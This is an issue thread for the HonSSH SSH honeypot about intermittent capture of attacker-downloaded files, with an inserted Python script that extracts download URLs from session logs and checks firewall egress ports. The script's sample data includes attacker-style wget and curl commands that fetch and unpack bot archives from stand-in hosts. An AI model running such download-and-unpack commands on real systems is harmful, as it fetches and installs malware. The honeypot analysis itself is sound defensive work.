tnich/honssh

File download working intermittently

Closed this issue · 10 comments

What steps will reproduce the problem?
1. The attacker logs in and downloads a file.

What is the expected behavior?
All files that are downloaded to the honeypot are also downloaded by HonSSH.

What do you see instead?
Only some files are downloaded, others are not.

What version of the product are you using?
56dfab7e24f1

On what operating system?
OpenBSD 5.3/5.4

Please provide any additional information below.
This is the first time I've noticed this. Two files were downloaded to the honeypot today; the only difference I can see between the two download events is the port the attacker connects to on the malware hosting server, HTTP on port 6666 in this case. If this is the case, it's not consistent either, as HonSSH has managed to do this before.

Adding log, adv-log and tty. Enjoy! :)

Original issue reported on code.google.com by are.hans...@gmail.com on 26 Mar 2014 at 10:32

Original comment by tnn...@googlemail.com on 26 Mar 2014 at 10:36

  • Changed state: Accepted
Bit worried about your .log file being so empty! 

Original comment by tnn...@googlemail.com on 26 Mar 2014 at 10:43

Yep, that is a bit concerning.

Original comment by are.hans...@gmail.com on 26 Mar 2014 at 10:44

Just looking into this and got a bit confused.

So the attacker downloads two files and honssh did not download any?

Original comment by tnn...@googlemail.com on 30 Mar 2014 at 1:44

As I recall the attacker downloaded two files, but HonSSH did not intercept any of them in this instance. It was able to intercept another file earlier the same day.

Don't have access to the machine atm, I'll dig out some more info for you if you like.

Original comment by are.hans...@gmail.com on 30 Mar 2014 at 1:50

Hmmm ok I understand :D

I just pasted the command into my test setup and it seems to catch and download 
it correctly. 
Any chance the firewall on the HonSSH box blocked port 6666 outbound (even when 
locally generated)?

Original comment by tnn...@googlemail.com on 30 Mar 2014 at 1:56

Hmmm... it's allowing tcp/6660-6669 from the honeynet.

It shouldn't block HonSSH from fetching files on the external interface, if 
that was the case I wouldn't see any downloads at all I think.

Sent from my Nokia 3310.

Original comment by are.hans...@gmail.com on 30 Mar 2014 at 2:02
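One check worth running when a download is missed, as an added example (not HonSSH's own code): pull every wget/curl URL out of the captured session commands, resolve each to a destination port, and compare against the ports the honeynet firewall lets the HonSSH host reach, since the honeypot re-fetches the same URL itself. The sample command lines, hosts and the allow-list (80, 443 plus the tcp/6660-6669 range from the comment above) are constructed for this example, and the URL extraction is a simplification that does not follow every downloader option.

```python
"""Extract download URLs from captured shell commands and check their
destination ports against an egress allow-list.

Added example for the thread above; this is not HonSSH code.
"""
import re
import shlex
from urllib.parse import urlsplit

# Constructed sample: attacker commands as they might appear in a honeypot
# tty log. Hosts and paths are made up (documentation address ranges).
SAMPLE_COMMANDS = [
    "wget http://198.51.100.23/.x/bot.tgz",
    "curl -s -o /tmp/.s http://198.51.100.23:6666/s.tgz",
    "cd /tmp; wget -q -O - http://203.0.113.9:8080/gb.tar.gz | tar xz",
    "uname -a",
]

# Assumed egress policy for the HonSSH host: 80/443 plus the tcp/6660-6669
# range mentioned in the thread. Adjust to the real pf.conf.
ALLOWED_EGRESS_PORTS = {80, 443} | set(range(6660, 6670))

DOWNLOADERS = ("wget", "curl", "fetch")
URL_RE = re.compile(r"^(?:https?|ftp)://", re.IGNORECASE)
DEFAULT_PORTS = {"http": 80, "https": 443, "ftp": 21}


def split_pipeline(cmdline):
    """Split a shell line on ; && || | into individual simple commands."""
    return [p for p in re.split(r"\s*(?:;|&&|\|\||\|)\s*", cmdline) if p]


def extract_downloads(cmdline):
    """Return (tool, url, host, port) for each downloader invocation whose
    argument is an absolute URL. Missing ports fall back to the scheme
    default so the firewall comparison always has a number to work with."""
    found = []
    for simple in split_pipeline(cmdline):
        try:
            argv = shlex.split(simple)
        except ValueError:
            continue  # unbalanced quotes in the captured line: skip it
        if not argv:
            continue
        tool = argv[0].rsplit("/", 1)[-1]  # handles /usr/bin/wget as well
        if tool not in DOWNLOADERS:
            continue
        for arg in argv[1:]:
            if not URL_RE.match(arg):
                continue
            u = urlsplit(arg)
            port = u.port if u.port is not None else DEFAULT_PORTS.get(u.scheme.lower())
            found.append((tool, arg, u.hostname, port))
    return found


def egress_blocked(downloads, allowed=ALLOWED_EGRESS_PORTS):
    """Return the downloads whose destination port the honeypot host's own
    fetch would not be permitted to reach under the given policy."""
    return [d for d in downloads if d[3] not in allowed]


def audit(commands=SAMPLE_COMMANDS, allowed=ALLOWED_EGRESS_PORTS):
    """Run the extraction over a list of captured commands."""
    downloads = [d for c in commands for d in extract_downloads(c)]
    return downloads, egress_blocked(downloads, allowed)


if __name__ == "__main__":
    downloads, blocked = audit()
    for entry in downloads:
        tool, url, host, port = entry
        flag = "BLOCKED" if entry in blocked else "ok"
        print(f"{flag:8} {tool:5} {host}:{port}  {url}")
```

With the sample input the port-6666 fetch is allowed by the assumed policy, matching the reasoning in the thread that the firewall alone would not explain a miss, while the 8080 fetch is flagged as something the HonSSH host could not reproduce.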

Ah yeah, that's true. I'll keep thinking.

Original comment by tnn...@googlemail.com on 30 Mar 2014 at 2:04

Original comment by tnn...@googlemail.com on 5 Apr 2014 at 4:37

  • Changed state: Started
Hopefully it will catch all now. Raise another issue if not :)

Original comment by tnn...@googlemail.com on 6 Apr 2014 at 2:40

  • Changed state: Fixed